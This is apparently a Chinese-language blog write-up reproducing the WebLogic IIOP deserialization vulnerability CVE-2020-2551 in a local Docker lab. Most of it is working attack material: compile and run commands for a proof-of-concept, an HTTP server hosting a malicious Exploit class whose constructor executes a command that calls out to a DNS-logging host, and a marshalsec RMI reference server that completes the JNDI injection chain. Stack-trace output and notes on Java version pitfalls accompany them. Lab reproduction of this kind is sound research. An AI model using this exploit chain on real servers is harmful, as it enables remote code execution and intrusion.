[CVE-2020-2551]Weblogic IIOP反序列化漏洞
所需jar包:
https://drive.google.com/file/d/1ssc_8kkjLnzVMTO7G2aswIMLxSLD1Ali/view?usp=sharing
#编译
/Library/Java/JavaVirtualMachines/jdk1.7.0_79.jdk/Contents/Home/bin/javac -cp /Users/caiqiqi/.m2/repository/org/springframework/spring-tx/4.3.16.RELEASE/spring-tx-4.3.16.RELEASE.jar:/Users/caiqiqi/Downloads/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar:. com/cqq/WeblogicCVE_2020_2551.java
#执行
/Library/Java/JavaVirtualMachines/jdk1.7.0_79.jdk/Contents/Home/bin/java -cp /Users/caiqiqi/Downloads/wlclient.jar:/Users/caiqiqi/.m2/repository/org/springframework/spring-tx/4.3.16.RELEASE/spring-tx-4.3.16.RELEASE.jar:/Users/caiqiqi/.m2/repository/org/springframework/spring-context/4.3.16.RELEASE/spring-context-4.3.16.RELEASE.jar:/Users/caiqiqi/Downloads/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar:. com.cqq.WeblogicCVE_2020_2551 127.0.0.1
WebLogic环境搭建
weblogic环境搭建工具,开始用docker 18搭建不成功,
![[CVE-2020-2551]Weblogic IIOP反序列化漏洞_第1张图片](http://img.e-com-net.com/image/info8/f0a154b459e942ce94e306836ecb61bf.jpg)
升级到docker到19.03.5之后,搭建成功。
失败原因可能说docker内置virtualbox的bug?
参考:
https://blogs.oracle.com/emeapartnerweblogic/weblogic-1212-installation-in-virtualbox-with-0-mhz-by-frank-munz
成功之后:
![[CVE-2020-2551]Weblogic IIOP反序列化漏洞_第2张图片](http://img.e-com-net.com/image/info8/6af7352240f64eaf9430072e727977e7.jpg)
南哥牛逼!
参考:
https://github.com/QAX-A-Team/WeblogicEnvironment
下载weblogic,和jdk。然后
# 构建
docker build --build-arg JDK_PKG=jdk-7u21-linux-x64.tar.gz --build-arg WEBLOGIC_JAR=fmw_12.1.3.0.0_wls.jar -t weblogic12013jdk7u21 .
# 运行
docker run -d -p 7001:7001 -p 8453:8453 -p 5556:5556 --name weblogic12013jdk7u21 weblogic12013jdk7u21
启动之后,查看weblogic的调试端口:
![[CVE-2020-2551]Weblogic IIOP反序列化漏洞_第3张图片](http://img.e-com-net.com/image/info8/a1a2a2938ec64ac8800e444d2163a169.jpg)
是8453端口。
最后使用10.3.6.0 + JDK7u21,
然后使用这个项目的代码打成功了,效果如下:
1、编译:
/Library/Java/JavaVirtualMachines/jdk1.7.0_79.jdk/Contents/Home/bin/javac -cp lib/com.bea.core.repackaged.apache.commons.logging_1.2.1.jar:lib/com.bea.core.repackaged.springframework.spring_1.2.0.0_2-5-3.jar:lib/permit-reflect-0.3.jar:lib/wlfullclient.jar com/payload/Main.java
2、执行:
/Library/Java/JavaVirtualMachines/jdk1.7.0_79.jdk/Contents/Home/bin/java -cp lib/com.bea.core.repackaged.apache.commons.logging_1.2.1.jar:lib/com.bea.core.repackaged.springframework.spring_1.2.0.0_2-5-3.jar:lib/permit-reflect-0.3.jar:lib/wlfullclient.jar:. com.payload.Main 127.0.0.1 7001 "rmi://192.168.170.1:1099/Exploit"
javax.naming.NamingException: Unhandled exception in rebind() [Root exception is org.omg.CORBA.MARSHAL: vmcid: 0x0 minor code: 0 completed: No]
at weblogic.corba.j2ee.naming.Utils.wrapNamingException(Utils.java:83)
at weblogic.corba.j2ee.naming.ContextImpl.rebind(ContextImpl.java:392)
at weblogic.corba.j2ee.naming.ContextImpl.rebind(ContextImpl.java:350)
at javax.naming.InitialContext.rebind(InitialContext.java:427)
at com.payload.Main.main(Main.java:46)
Caused by: org.omg.CORBA.MARSHAL: vmcid: 0x0 minor code: 0 completed: No
at weblogic.corba.idl.RemoteDelegateImpl.postInvoke(RemoteDelegateImpl.java:477)
at weblogic.corba.idl.RemoteDelegateImpl.invoke(RemoteDelegateImpl.java:384)
at weblogic.corba.idl.RemoteDelegateImpl.invoke(RemoteDelegateImpl.java:341)
at org.omg.CORBA.portable.ObjectImpl._invoke(ObjectImpl.java:475)
at weblogic.corba.cos.naming._NamingContextAnyStub.rebind_any(_NamingContextAnyStub.java:52)
at weblogic.corba.j2ee.naming.ContextImpl.rebind(ContextImpl.java:378)
... 3 more
Caused by: org.omg.CORBA.MARSHAL: vmcid: 0x0 minor code: 0 completed: No
at sun.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)
at sun.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:57)
at sun.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)
at java.lang.reflect.Constructor.newInstance(Constructor.java:526)
at java.lang.Class.newInstance(Class.java:379)
at weblogic.iiop.ReplyMessage.getThrowable(ReplyMessage.java:318)
at weblogic.corba.idl.RemoteDelegateImpl.postInvoke(RemoteDelegateImpl.java:468)
... 8 more
------------------------
----没有回显 自行检测----
------------------------
监听的HTTP服务
python3 -m http.server 80
下放Exploit.java编译后的Exploit.class文件:
public class Exploit{
public Exploit(){
try{
java.lang.Runtime.getRuntime().exec("ping weblogic.f9daa4b2c9be9ad66693.d.zhack.ca");
} catch(java.io.IOException e){
e.printStackTrace();
}
}
}
然后使用marshalsec创建一个RMI服务:
java -cp /Users/caiqiqi/GitProjects/marshalsec/target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.170.1/#Exploit" 1099
开始以为是weblogic版本的问题,后来发现JDK7u21 + 12.1.3.0版本也成功了。所以应该是之前的poc的问题了。
![[CVE-2020-2551]Weblogic IIOP反序列化漏洞_第4张图片](http://img.e-com-net.com/image/info8/662d22b5a37c4e129cf04dc730d6c0fc.jpg)
需要使用低版本的javac进行编译Exploit.java,成功之后的log是这样的:
![[CVE-2020-2551]Weblogic IIOP反序列化漏洞_第5张图片](http://img.e-com-net.com/image/info8/dc127b0b03234b1a9b0a5a6546c11081.jpg)
若使用高版本的javac编译Exploit.java:
![[CVE-2020-2551]Weblogic IIOP反序列化漏洞_第6张图片](http://img.e-com-net.com/image/info8/bbcd4e2ffe1749f28caaba2d26c25479.jpg)
参考
https://github.com/Y4er/CVE-2020-2551
利用不成功的可以参考这篇文章:
漫谈WebLogic CVE-2020-2551
杂
关于com.bea.core.repackaged
开始以为PoC里的JtaTransactionManager是Spring自带的org.springframework.transaction.jta.JtaTransactionManager,后来看大家的poc才知道这个类是weblogic自带的com.bea.core.repackaged.springframework.transaction.jta.JtaTransactionManager,不深入研究了。
![[CVE-2020-2551]Weblogic IIOP反序列化漏洞_第7张图片](http://img.e-com-net.com/image/info8/bd24ebea5e324185b0ff059b04dc728b.jpg)